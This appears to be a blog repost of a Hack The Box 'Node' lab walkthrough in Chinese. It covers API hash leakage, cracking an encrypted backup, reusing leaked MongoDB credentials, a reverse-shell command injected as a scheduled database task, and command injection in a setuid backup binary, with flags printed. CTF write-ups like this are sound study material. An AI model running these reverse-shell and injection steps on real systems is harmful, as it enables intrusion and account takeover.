[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…

2024-08-22 145 0

信息收集

IP Address Opening Ports
10.10.10.58 TCP:22,3000

$ nmap -p- 10.10.10.58 --min-rate 1000 -sC -sV -Pn

PORT     STATE SERVICE            VERSION
22/tcp   open  ssh                OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
|   256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
|_  256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
3000/tcp open  hadoop-tasktracker Apache Hadoop
| hadoop-datanode-info: 
|_  Logs: /login
|_http-title: MyPlace
| hadoop-tasktracker-info: 
|_  Logs: /login
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP & Backup zip

http://10.10.10.58:3000/

[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图

http://10.10.10.58:3000/api/users/

[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图1

https://crackstation.net/

[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图2

http://10.10.10.58:3000/login

username:myP14ceAdm1nAcc0uNT,tom,mark,rastating
password:manchester,spongebob,snowflake,NULL

[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图3

$ binwalk myplace.backup

[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图4

$ cat myplace.backup|base64 -d >myplace.backup.decode

[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图5

[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图6

$ zip2john myplace.backup.decode -o myplace.backup.decode.john

$ john --wordlist=/usr/share/wordlists/rockyou.txt myplace.backup.decode.john

password:magicword

[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图7

$ unzip myplace.backup.decode

$ cat var/www/myplace/app.js

mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace

[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图8

TRP00F Skip Root

https://github.com/MartinxMax/trp00f

$ python3 trp00f.py --lhost 10.10.16.24 --lport 10033 --rhost 10.10.16.24 --rport 10034 --http 9999 --password '5AYRft73VtFpc84k'

[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图9

mark to tom & mongoDB 任务注入

$ ssh [email protected]

[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图10

$ cat /var/www/myplace/app.js

[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图11

该脚本将连接到Mongo数据库,然后每30秒运行一系列命令。它将从任务集合中获取项。对于每个文档,它会将doc.cmd传递给exec运行它,然后删除该文档。

$ mongo -u mark -p 5AYRft73VtFpc84k scheduler
> show collections
> db.tasks.insert({"cmd": "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.16.24/10035 0>&1'"})
> db.tasks.find()

[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图12

User.txt

b0ca19843af3d049a782f7f16b0cf144

权限提升 & 命令注入

[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图13

$ file /usr/local/bin/backup

[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图14

[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图15

在第一个参数中存在一个-q选项

[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图16

[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图17

[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图18

$ /usr/local/bin/backup -q "" '
/bin/bash'

[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TR…插图19

Root.txt

2278ab816e1cd3204d1b331144bf9704


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论